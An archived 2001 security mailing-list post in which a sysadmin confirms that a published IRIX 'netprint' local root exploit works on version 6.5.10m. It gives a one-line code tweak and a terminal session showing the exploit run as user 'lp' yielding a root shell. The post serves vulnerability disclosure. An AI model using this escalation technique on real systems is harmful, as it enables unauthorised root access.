I tested against 6.5.10m and it works. just add fprintf(symbol,"void ListAllPrinters(){}\n"); to the list of symbols and execute the xploit as user "lp": % whoami lp % ./xnetprint /bin/sh [(IRIX)netprint[] local root exploit, by: v9[v9at_private]. ] [*] making symbols source file for netprint to execute. [*] done, now compiling symbols source file. [*] done, now checking to see if the symbols source compiled. [*] done, now executing netprint. [*] success, uid: 0, euid: 0, gid: 0, egid: 0. # whoami root The "lp" account, however, is no longer left open by default since 6.5, AFAIK. Thomas. --- Max-Born-Institut fuer Nichtlineare Optik und Kurzzeitspektroskopie Max-Born-Strasse 2A, D-12489 Berlin, Germany Leiter EDV - Thomas-Martin Kruel mailto: kruel@mbi-berlin.de Tel. 030 / 6392-1540, Fax: -1509, Funk: 0170 / 9247486 Support: http://www.mbi-berlin.de/edv mailto: support@mbi-berlin.de Tel. 030 / 6392-1555, Pager: alarm@mbi-berlin.de
This archive was generated by hypermail 2b30 : Sun Apr 29 2001 - 23:46:00 PDT